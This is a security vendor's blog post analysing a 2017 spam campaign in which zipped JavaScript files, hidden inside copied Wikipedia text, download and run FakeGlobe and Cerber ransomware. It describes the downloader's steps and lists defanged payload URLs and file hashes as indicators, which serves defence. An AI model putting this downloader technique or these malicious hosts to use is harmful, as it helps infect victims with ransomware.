Trustwave SpiderLabs Exposes Unique Cybersecurity Threats in the Public Sector. Learn More

Trustwave SpiderLabs Exposes Unique Cybersecurity Threats in the Public Sector. Learn More

Services
Capture
Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

twi-managed-portal-color
Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

twi-briefcase-color-svg
Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

tw-laptop-data
Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

twi-database-color-svg
Database Security

Prevent unauthorized access and exceed compliance requirements.

twi-email-color-svg
Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

tw-officer
Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

tw-network
Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Solutions
BY TOPIC
Offensive Security
Solutions to maximize your security ROI
Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Partners
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

The Spam, JavaScript and Ransomware Triangle

Authors: Dr. Fahim Abbasi and Nicholas Ramos

Introduction

Our global spam honeypot sensors detected a pervasive email campaign that was leveraging a zipped attachment containing a malicious JavaScript. When opened, the JavaScript was used to infect victims with ransomware. This campaign started in the late hours of 17th July 2017, and after peaking at over 1.2 million messages, ended on the 19th of July, 2017. Similar burst was observed a couple of days later on the 25th of July, that ended on the 27th of July 2017, as illustrated by the timeline in Figure 1 and Table 1.

10343_84279252-5cbf-4210-bac1-0a74b7f3f4c4
Figure 1: Timeline of the spam campaign showing the spam peaks

 

Table 1: Spam by country of origin for this campaign.

12650_f298a4f6-c4c6-45a4-ad72-22c8935883ae

 

7726_060a6369-2416-4a1d-a332-38cd7ced8a72

 




 

Analysis of the Email Body

Last May, we reported a spam campaign distributing both FakeGlobe and Cerber ransomwares. While the campaign lasted a few days, we recently observed similar malware being spammed out in a different campaign. This campaign used the same blank subject and body, but had a different attachment of a compressed JavaScript (JS) file. There were two different sets of Zip files used in this campaign, each containing a distinct set of JavaScript code. Both JS files appeared to be using the same code template, but contained different URLs pointing towards different malware. Anonymized screenshots of the two spam messages, with the attachments are illustrated in Figure 2 and 3. Here in both messages, the Subject field and body was blank or empty. It has been a common technique to use blank subject and body to make it hard for anti-spam signature-based detections, and serves as a simple template for spammers.

11040_a56c8e93-767e-4b5a-9378-3b6f1bf2952e
Figure 2: Sample Email message with the zipped attachment
 
11422_b80aa951-db02-45d4-af47-27a46e370e45
Figure 3: Sample Email message with a similar zipped attachment

Analysis of the Attachment

The Malicious JavaScript (JS)

Saving the attachment to disk and unzipping it reveals a JavaScript file. Double-clicking on this JavaScript file may execute it, which is the aim of the spammers. This JavaScript sample is unique as it is embedded inside paragraphs of readable text, apparently copied from Wikipedia articles about different countries. We believe the paragraphs have been placed at the top of the script to give the appearance of a benign-looking text file to evade both automated scanners and any human expert who might preview it in any text editor. A screenshot of one such sample is illustrated here in Figure 4 and Figure 5. Apparently, in this case, the text passage has been copied across from a Wikipedia article about China.

11483_bb49a1a2-0115-40c7-9595-78de62612f93
Figure 4: Top of the JavaScript file containing a long Wikipedia article about China

 

BSL_11995_d3e6f499-7d26-45bb-b61c-0d76ee605a77
Figure 5:JavaScript functions embedded inside the text of the article and at the bottom of it.

 

There are over 30 obfuscated JS functions crafted by the attackers in this malicious JavaScript sample. These functions perform their malicious activities once they get run by a trigger function call as illustrated in Figure 6.

10817_9b36e307-a327-47f7-991f-c0de109c6e1d
Figure 6: Trigger function that recursively calls all the other malicious JS functions

 

The trigger function first de-obfuscates URLs and then uses them to download the malicious payload. The script employs a simple de-obfuscation method by removing commas from the obfuscated URLs. As a failsafe method, the attackers have embedded five different URLs in this function to force the victim to download at least one malicious payload, in case any others have been taken offline. A code snippet is illustrated in Figure 7.

11986_d3575e38-eaf9-42fa-996d-c6cf673fb4b5
Figure 7: URLs hosting malicious payload are de-obfuscated

 

These malicious URLs are then supplied to a downloader function. The downloader function uses a Microsoft ActiveX object namely MSXML2.XMLHTTP. This object is used to send an arbitrary HTTP request, receive the response, and have the Microsoft XML Document Object Model (DOM) parse that response. Here the Open method is used to Initialize an MSXML2.XMLHTTP request and specifies the method, and URL as shown in Figure 8. The use of Microsoft ActiveX Objects indicate that the spammers are targeting Microsoft Windows victims. The script could be executed simply by double-clicking on it in a Windows OS. This is facilitated by the Microsoft Windows Scripting Host (WSH), which is a framework for running and automating scripts from the GUI using WScript.exe or from the command line using CScript.exe. The WSH supports scripting engines like Jscript and VBScript. Additionally, this script could be interpreted and executed by web browsers, especially Microsoft Internet Explorer and Edge. Other browsers running the IE extensions that support ActiveX objects may also be vulnerable.

9549_5f88c9e1-3779-4964-92b8-1e5beb5b8f25
Figure 8: The Downloader function, that initiates the file download over HTTP, along with some inline comments

 

Next, the attackers leverage the ActiveX stream and filesystem object to save the downloaded file to the temp folder as a randomly named JPG and then rename it to an EXE as illustrated in figure 9, 10 and 11.

12215_dfac1278-b6d1-4f93-ba9b-b20921b5678e
Figure 9: Save the malicious payload in temp folder as a JPG, code along with some inline comments shown

 

12341_e626bca8-b63e-4a58-ac54-72bc5bdbb9f9
Figure 10: Stream object used to save the downloaded file to disk

 

11884_ce1b90a2-abfe-42f2-8af0-3bfa91ae1268
Figure 11:Malicious file extension is changed from .JPG to .EXE, code along with some inline comments shown

 

Finally, the malicious payload is executed using the ActiveX WScript Shell object that executes the downloaded malware payload sample as illustrated in Figure 12. In summary, this JavaScript sample is a downloader and executor.

 

12165_dd1d6fde-bf20-4bff-8b4d-cabda7ff0ffb
Figure 12: Payload execution via WScript Shell ActiveX Object, code along with some inline comments shown

 

Analysis of the Malicious Payload dropped by the JS

We had two different JavaScript samples, which were packaged with the same code template but were configured using different URLs. This results in downloading two different ransomware families namely "FakeGlobe" ransomware and "Cerber" ransomeware.

Payload – IOC

FakeGlobe Ransomware

This was hosted on the embedded URLs ending with *.dat extension. An example URL extracted from the JS file is listed here:

URL: hxxp://astromfghqmo.com/error.php?f=1.dat

Hash of the Downloaded Files:

  • MD5:D885A811324370FD2CA8ED9075A71652
  • SHA1:DF799BC0225C5391DAE2F0044AAAE745A2C64E14

Encrypted Files and Ransom Note for FakeGlobe:

After execution, the FakeGlobe ransomware samples encrypts and renames files. The encrypted files are renamed using the *.crypt extension name as shown in figure 13 and a ransomware note is setup as a HTML shown in figure 14.

10793_99e1aa10-49d4-4be5-bd76-1e5055102246
Figure 13: Files renamed with *.crypt extension

 

12581_efc2984f-7d8f-4c35-afcb-5ae2fa47a52e
Figure 14: FakeGlobe Ransomware Note

 

Cerber Ransomware

The Cerber ransomware was hosted on URLs ending with the *.doc extension. A few URLs extracted from the JS file are listed here:

URLs:

  • hxxp://asopusforums.date/1.doc
  • hxxp://ariadnerevolution.date/1.doc
  • hxxp://asbetosgem.trade/1.doc
  • hxxp://phaennabazaar.trade/1.doc
  • hxxp://dolopolesasz.com/1.doc

Hash of Downloaded Files:

  • MD5: FE1BC60A95B2C2D77CD5D232296A7FA4
  • SHA1: C07DFDEA8DA2DA5BAD036E7C2F5D37582E1CF684

Encrypted Files and Ransom Note:

After execution, the Cerber ransomware sample encrypts and renames files. Files encrypted by Cerber ransomware use random filename and extensions, for this sample it used random files with this extension "*.ab22" as shown in Figure 15. The usual Cerber will drop ransom note on both "*.hta" and "*.txt" formats as shown in figure 16 and 17.

7737_066a084c-864e-4926-9ce0-bafb8d82d002
Figure 15:Encrypted files with random name and *.ab22 extension

 

10825_9ba8bc8f-ece6-484f-97e1-51bd7d609b32
Figure 16: Ransom note Text file contents

 

Aside from the files it will also change the wallpaper to display a ransom note, a typical behavior of Cerber.

12875_fd29aa8b-4163-41e6-b6bf-343afb04f095

Figure 17: Ransom note HTML file contents

 

Conclusion

Attackers are leveraging the simplicity provided by email to distribute ransomware to global victims. We detected one such campaign where attackers sent millions of spam messages detected by our distributed honeypot sensors. These spam messages contained a blank Subject line and had an empty message body. The messages could be categorized into two different sets, each serving a different zip attachment, that contains a similar obfuscated JavaScript file. The JS files contain the same code template, but are configured with a distinct set of URLs that point to different ransomwares. Once executed the ransomware infects and encrypts files on the victim's computer for ransom. As a mitigation measure, customers should consider blocking JS files at the email gateway, as recently much malware we are seeing is being distributed via such scripts. Trustwave's Secure Email Gateway effectively detects and deters this campaign, thus protecting our customers from the threats posed by cyber criminals.

Latest SpiderLabs Blogs

Important Security Defenses to Help Your CISO Sleep at Night

This is Part 13 in my ongoing project to cover 30 cybersecurity topics in 30 weekly blog posts. The full series can be found here.

Read More

2024 Public Sector Threat Landscape: Trustwave Threat Intelligence Briefing and Mitigation Strategies

Trustwave SpiderLabs’ 2024 Public Sector Threat Landscape: Trustwave Threat Intelligence Briefing and Mitigation Strategies report details the security issues facing public sector security teams as...

Read More

How to Create the Asset Inventory You Probably Don't Have

This is Part 12 in my ongoing project to cover 30 cybersecurity topics in 30 weekly blog posts. The full series can be found here.

Read More